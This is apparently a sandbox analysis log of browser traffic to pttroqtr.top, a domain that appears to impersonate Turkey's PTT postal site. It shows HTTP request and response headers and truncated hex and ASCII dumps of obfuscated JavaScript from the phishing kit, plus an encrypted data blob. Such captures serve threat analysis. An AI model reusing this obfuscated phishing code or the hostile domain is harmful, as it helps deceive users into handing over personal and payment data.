                                                                                                                                                                                            Content-Length: 1116
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            ETag: W/"45c-huDa2saUgbWr0Queb+6JhJWj/rQ"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC1116INData Raw: 55 32 46 73 64 47 56 6b 58 31 2f 57 75 70 41 69 61 48 48 44 6f 2f 78 37 69 36 33 52 4d 30 7a 32 33 38 35 55 63 6c 61 38 74 61 7a 68 41 78 35 55 48 70 44 32 66 72 50 55 44 51 44 2b 55 4a 36 4a 46 65 6c 76 53 50 76 4a 78 79 42 77 55 4c 68 47 74 77 73 37 56 2b 63 42 6e 75 44 59 63 51 50 50 78 37 4b 59 71 57 4c 63 46 74 48 54 42 44 2b 38 4f 44 79 61 6f 6b 57 42 37 51 6e 69 42 32 61 4a 59 6d 36 6c 61 46 59 69 37 63 6d 2f 36 33 39 37 50 70 34 6c 4e 6d 34 58 52 69 78 2b 44 75 51 46 41 62 49 47 62 53 73 31 33 48 43 42 33 65 4c 49 5a 6f 30 39 62 51 34 75 51 4a 6d 71 6f 41 62 4f 70 63 50 49 53 55 78 39 58 35 78 62 54 55 4b 6f 6c 76 4f 39 2f 6e 31 56 39 55 2f 72 6a 79 38 6e 50 53 6f 70 53 62 31 4e 52 45 43 4c 71 77 61 69 58 57 6b 57 43 7a 4a 33 73 69 4e 73 50 65 2b
                                                                                                                                                                                            Data Ascii: U2FsdGVkX1/WupAiaHHDo/x7i63RM0z2385Ucla8tazhAx5UHpD2frPUDQD+UJ6JFelvSPvJxyBwULhGtws7V+cBnuDYcQPPx7KYqWLcFtHTBD+8ODyaokWB7QniB2aJYm6laFYi7cm/6397Pp4lNm4XRix+DuQFAbIGbSs13HCB3eLIZo09bQ4uQJmqoAbOpcPISUx9X5xbTUKolvO9/n1V9U/rjy8nPSopSb1NRECLqwaiXWkWCzJ3siNsPe+


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            25192.168.2.5497428.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:27 UTC364OUTGET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:27 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 161114
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"2755a-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16020INData Raw: 63 6f 6e 73 74 20 61 33 33 5f 30 78 37 36 32 63 37 31 3d 61 33 33 5f 30 78 64 61 36 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 64 32 30 33 39 2c 5f 30 78 33 34 61 33 38 65 29 7b 63 6f 6e 73 74 20 5f 30 78 33 30 33 62 61 65 3d 61 33 33 5f 30 78 64 61 36 65 2c 5f 30 78 32 32 66 32 35 61 3d 5f 30 78 31 64 32 30 33 39 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 63 31 65 34 62 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 31 66 34 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 34 38 61 29 29 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 38 34 33 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30
                                                                                                                                                                                            Data Ascii: const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt(_0x30
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 66 3d 5c 78 32 32 68 27 2c 27 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 27 2c 27 61 76 61 6c 65 5c 78 32 30 48 69 7a 6d 27 2c 27 2d 34 34 27 2c 27 72 69 7a 5c 78 32 30 54 c3 bc 72 6b 69 79 27 2c 27 72 6d 65 6e 75 27 2c 27 65 6d 5f 70 74 74 5f 6c 6f 67 27 2c 27 5c 78 32 32 41 6a 61 78 4c 69 6e 6b 5c 78 32 32 27 2c 27 75 63 75 6c 75 6b 5c 78 32 32 3e 3c 61 27 2c 27 65 62 61 70 70 72 6f 6f 74 2f 27 2c 27 69 6d 69 7a 2e 61 73 70 78 27 2c 27 72 2f 6f 6e 6c 69 6e 65 54 65 27 2c 27 52 70 64 6a 34 38 5a 47 6c 32 27 2c 27 65 6d 5f 70 74 74 5f 74 65 6c 27 2c 27 65 6d 5f 6c 6f 6a 69 73 74 69 27 2c 27 61 2e 61 73 70 78 23 70 74 74 27 2c 27 6b 61 72 74 5f 70 74 74 6d 61 27 2c 27 65 73 61 70 5c 78 32 30 42 69 6c 64 69 27 2c 27 39 73 4c 58 68 7a 4c 54 51 6e 27 2c
                                                                                                                                                                                            Data Ascii: f=\x22h','iv\x20class=\x22','avale\x20Hizm','-44','riz\x20Trkiy','rmenu','em_ptt_log','\x22AjaxLink\x22','uculuk\x22><a','ebapproot/','imiz.aspx','r/onlineTe','Rpdj48ZGl2','em_ptt_tel','em_lojisti','a.aspx#ptt','kart_pttma','esap\x20Bildi','9sLXhzLTQn',
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 35 31 29 5d 29 5b 27 68 72 65 66 27 5d 2c 53 3d 27 27 2b 6e 65 77 20 55 52 4c 28 27 2e 2e 2f 6c 61 79 6f 75 74 2f 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 36 36 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 37 62 64 29 2c 69 6d 70 6f 72 74 2e 6d 65 74 61 5b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 35 31 29 5d 29 5b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 39 61 29 5d 2c 78 3d 27 27 2b 6e 65 77 20 55 52 4c 28 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 61 31 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 66 30 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 37 62 64 29 2c 69 6d 70 6f 72 74 2e 6d 65 74 61 5b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 35 31 29
                                                                                                                                                                                            Data Ascii: a33_0x762c71(0x851)])['href'],S=''+new URL('../layout/'+a33_0x762c71(0x866)+a33_0x762c71(0x7bd),import.meta[a33_0x762c71(0x851)])[a33_0x762c71(0x59a)],x=''+new URL(a33_0x762c71(0x4a1)+a33_0x762c71(0x3f0)+a33_0x762c71(0x7bd),import.meta[a33_0x762c71(0x851)
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 63 37 31 28 30 78 31 30 37 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 31 37 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 34 66 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 38 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 31 35 63 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 39 30 29 2b 27 46 73 61 53 63 2b 50 47 52 70 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 62 35 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 39 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 39 34 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 31 66 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 35 31 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 39 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31
                                                                                                                                                                                            Data Ascii: c71(0x107)+a33_0x762c71(0x17d)+a33_0x762c71(0x54f)+a33_0x762c71(0x58d)+a33_0x762c71(0x15c)+a33_0x762c71(0x890)+'FsaSc+PGRp'+a33_0x762c71(0xb5)+a33_0x762c71(0x893)+a33_0x762c71(0x594)+a33_0x762c71(0x51f)+a33_0x762c71(0x651)+a33_0x762c71(0x69d)+a33_0x762c71
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 63 37 31 28 30 78 31 63 30 29 2b 27 72 61 70 27 2c 27 72 6f 6c 65 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 64 39 29 2c 27 69 64 27 3a 27 73 6d 2d 31 36 38 38 38 38 38 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 33 34 29 2b 27 2d 32 27 2c 27 61 72 69 61 2d 68 69 64 64 65 6e 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 64 30 29 2c 27 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 27 3a 27 73 6d 2d 31 36 38 38 38 38 38 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 33 34 29 2b 27 2d 31 27 2c 27 61 72 69 61 2d 65 78 70 61 6e 64 65 64 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 37 63 29 7d 2c 5b 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 6c 69 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28
                                                                                                                                                                                            Data Ascii: c71(0x1c0)+'rap','role':a33_0x762c71(0x3d9),'id':'sm-1688888'+a33_0x762c71(0x234)+'-2','aria-hidden':a33_0x762c71(0x2d0),'aria-labelledby':'sm-1688888'+a33_0x762c71(0x234)+'-1','aria-expanded':a33_0x762c71(0x47c)},[a33_0x24c54e('li',{'class':a33_0x762c71(
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 63 37 31 28 30 78 33 66 36 29 2c 27 68 72 65 66 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 35 66 29 2b 27 77 2e 70 74 74 2e 67 6f 76 2e 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 64 63 29 2b 27 72 2f 50 6f 73 74 61 2f 50 6f 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 63 39 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 36 37 29 2b 27 78 27 2c 27 61 72 69 61 2d 68 61 73 70 6f 70 75 70 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 64 30 29 2c 27 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 27 3a 27 73 6d 2d 31 36 38 38 38 38 38 27 2b 27 34 38 33 33 36 32 30 38 31 33 27 2b 27 2d 31 36 27 2c 27 61 72 69 61 2d 65 78 70 61 6e 64 65 64 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 37 63 29 7d 2c 5b 61 33 33 5f 30
                                                                                                                                                                                            Data Ascii: c71(0x3f6),'href':a33_0x762c71(0x55f)+'w.ptt.gov.'+a33_0x762c71(0x3dc)+'r/Posta/Po'+a33_0x762c71(0x5c9)+a33_0x762c71(0x367)+'x','aria-haspopup':a33_0x762c71(0x2d0),'aria-controls':'sm-1688888'+'4833620813'+'-16','aria-expanded':a33_0x762c71(0x47c)},[a33_0
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 31 28 30 78 35 61 33 29 2b 27 34 38 33 33 36 32 30 38 31 33 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 36 65 29 2c 27 68 72 65 66 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 35 66 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 34 65 29 2b 27 74 72 2f 53 61 79 66 61 6c 61 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 36 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 62 32 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 63 33 29 2b 27 2e 61 73 70 78 27 2c 27 61 72 69 61 2d 68 61 73 70 6f 70 75 70 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 64 30 29 2c 27 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 61 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30
                                                                                                                                                                                            Data Ascii: 1(0x5a3)+'4833620813'+a33_0x762c71(0x36e),'href':a33_0x762c71(0x55f)+a33_0x762c71(0x64e)+'tr/Sayfala'+a33_0x762c71(0x563)+a33_0x762c71(0xb2)+a33_0x762c71(0x3c3)+'.aspx','aria-haspopup':a33_0x762c71(0x2d0),'aria-controls':a33_0x762c71(0x5a3)+a33_0x762c71(0
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 30 78 37 36 32 63 37 31 28 30 78 65 36 29 29 5d 29 5d 29 5d 29 2c 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 6c 69 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 30 31 29 2b 27 65 6d 27 2c 27 69 64 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 64 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 64 30 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 35 35 29 2b 27 6d 6c 65 72 69 27 7d 2c 5b 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 61 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 65 37 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 30 63 29 2b 27 61 67 65 5c 78 32 30 68 61 73 2d 73 75 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 30 37 29 2c 27 69 64 27
                                                                                                                                                                                            Data Ascii: 0x762c71(0xe6))])])]),a33_0x24c54e('li',{'class':a33_0x762c71(0x801)+'em','id':a33_0x762c71(0x6dd)+a33_0x762c71(0x8d0)+a33_0x762c71(0x355)+'mleri'},[a33_0x24c54e('a',{'class':a33_0x762c71(0x5e7)+a33_0x762c71(0x50c)+'age\x20has-su'+a33_0x762c71(0x207),'id'
                                                                                                                                                                                            2024-09-28 03:39:27 UTC16384INData Raw: 5d 29 2c 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 6c 69 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 30 31 29 2b 27 65 6d 27 2c 27 69 64 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 64 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 63 31 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 30 34 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 34 38 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 61 37 29 7d 2c 5b 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 61 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 65 37 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 30 63 29 2b 27 61 67 65 27 2c 27 68 72 65 66 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30
                                                                                                                                                                                            Data Ascii: ]),a33_0x24c54e('li',{'class':a33_0x762c71(0x801)+'em','id':a33_0x762c71(0x6dd)+a33_0x762c71(0x4c1)+a33_0x762c71(0x404)+a33_0x762c71(0x548)+a33_0x762c71(0x3a7)},[a33_0x24c54e('a',{'class':a33_0x762c71(0x5e7)+a33_0x762c71(0x50c)+'age','href':a33_0x762c71(0
                                                                                                                                                                                            2024-09-28 03:39:27 UTC14022INData Raw: 63 37 31 28 30 78 34 61 66 29 2b 27 75 79 61 72 69 5c 78 32 32 5c 78 32 30 63 6c 61 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 37 31 29 2b 27 3e 59 61 73 61 6c 5c 78 32 30 55 79 61 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 61 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 34 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 38 63 29 2b 27 6d 5f 70 74 74 5f 62 69 6c 67 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 37 36 34 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 39 31 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 37 62 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 37 63 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 36 65 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33
                                                                                                                                                                                            Data Ascii: c71(0x4af)+'uyari\x22\x20cla'+a33_0x762c71(0x871)+'>Yasal\x20Uya'+a33_0x762c71(0x4a3)+a33_0x762c71(0x343)+a33_0x762c71(0x28c)+'m_ptt_bilg'+a33_0x762c71(0x764)+a33_0x762c71(0x591)+a33_0x762c71(0x7b3)+a33_0x762c71(0x27c)+a33_0x762c71(0x46e)+a33_0x762c71(0x3


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            26192.168.2.5497458.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:27 UTC364OUTGET /help/assets/c27b6911JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC360INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:27 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 1892
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"764-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC1892INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 36 38 32 35 3d 61 32 34 5f 30 78 33 32 34 62 28 29 3b 72 65 74 75 72 6e 20 61 32 34 5f 30 78 35 33 34 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 30 64 65 37 2c 5f 30 78 63 65 30 63 62 32 29 7b 5f 30 78 33 62 30 64 65 37 3d 5f 30 78 33 62 30 64 65 37 2d 30 78 36 37 3b 6c 65 74 20 5f 30 78 33 32 34 62 64 62 3d 5f 30 78 35 35 36 38 32 35 5b 5f 30 78 33 62 30 64 65 37 5d 3b 72 65 74 75 72 6e 20 5f 30 78 33 32 34 62 64 62 3b 7d 2c 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 33 32 34 62 28 29 7b 63 6f 6e
                                                                                                                                                                                            Data Ascii: function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(){con


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            27192.168.2.5497468.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:27 UTC364OUTGET /help/assets/cbcdcea5JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:27 UTC361INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:27 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 6098
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"17d2-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:27 UTC6098INData Raw: 63 6f 6e 73 74 20 61 32 36 5f 30 78 32 66 36 62 32 65 3d 61 32 36 5f 30 78 32 31 39 35 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 32 36 64 35 2c 5f 30 78 35 38 66 37 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 62 61 30 32 3d 61 32 36 5f 30 78 32 31 39 35 2c 5f 30 78 35 36 65 64 31 35 3d 5f 30 78 34 62 32 36 64 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 63 32 66 33 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 33 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 39 61 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61
                                                                                                                                                                                            Data Ascii: const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_0x55ba


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            28192.168.2.5497478.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:28 UTC532OUTGET /help/assets/0e738ae1JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:28 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:28 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 112550
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"1b7a6-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:28 UTC16020INData Raw: 63 6f 6e 73 74 20 61 31 5f 30 78 35 34 31 34 36 61 3d 61 31 5f 30 78 31 61 33 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 30 31 39 61 2c 5f 30 78 34 62 64 31 65 66 29 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 31 34 66 3d 61 31 5f 30 78 31 61 33 33 2c 5f 30 78 34 66 30 39 64 66 3d 5f 30 78 31 35 30 31 39 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 33 61 65 64 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 63 30 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 64 32 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 65 31 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66
                                                                                                                                                                                            Data Ascii: const a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x4ad14f
